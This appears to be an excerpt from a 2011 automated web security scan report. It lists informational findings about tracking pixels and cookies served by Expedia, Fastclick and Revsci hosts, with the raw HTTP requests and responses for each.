HTTP/1.1 200 OK Content-Length: 6764 Content-Type: image/gif Last-Modified: Tue, 29 Mar 2011 15:31:23 GMT Accept-Ranges: bytes ETag: "801725c26eecb1:0" Server: Microsoft-IIS/6.0 Cache-Control: max-age=900 Date: Fri, 06 May 2011 22:34:07 GMT Connection: close Set-Cookie: U9Z5=3JobJP3Sc0j1DW1jnIUl P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI" .PNG . ...IHDR.......k.....(.-P.. b..Je..0CH@D.......H..... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://media.expedia.com |
Path: | /media/content/expus |
GET /media/content/expus Host: media.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511 |
HTTP/1.1 200 OK Content-Length: 7260 Content-Type: image/gif Last-Modified: Tue, 24 Aug 2010 16:01:27 GMT Accept-Ranges: bytes ETag: "80e5a29ba543cb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: max-age=900 Date: Fri, 06 May 2011 22:34:07 GMT Connection: close Set-Cookie: U9Z5=31asoEm0mc0hSRC P3P: CP="NON DSP ADM DEV PSD OUR IND STP PHY PRE NAV UNI" GIF89a2.J....Ul~'CX$Mj... ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://media.fastclick |
Path: | /w/tre |
GET /w/tre?ad_id=18527;evt Host: media.fastclick.net Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: vt=9556:293096:548207 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 22:33:37 GMT P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV' Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: image/gif Content-Length: 43 Set-Cookie: lyc=BgAAAASbLb9NACAA Set-Cookie: pluto=822523287793|v1; domain=.fastclick.net; path=/; expires=Sun, 05-May-2013 22:33:37 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://om.expedia.com |
Path: | /b/ss/expedia1/1/G.9p2 |
GET /b/ss/expedia1/1/G.9p2 Host: om.expedia.com Proxy-Connection: keep-alive Referer: http://www.expedia.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: p1=`tpid=v.1,1`11; ipsnf3=v.3|US|1|511 |
HTTP/1.1 302 Found Date: Fri, 06 May 2011 22:33:39 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26E23BA1 Location: http://om.expedia.com/b X-C: ms-4.4.1 Expires: Thu, 05 May 2011 22:33:39 GMT Last-Modified: Sat, 07 May 2011 22:33:39 GMT Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA" xserver: www170 Content-Length: 0 Content-Type: text/plain |
Severity: | Information |
Confidence: | Certain |
Host: | http://pix04.revsci.net |
Path: | /H07710/b3/0/3/noscript |
GET /H07710/b3/0/3/noscript Host: pix04.revsci.net Proxy-Connection: keep-alive Referer: http://fls.doubleclick User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=8e1e11639864 |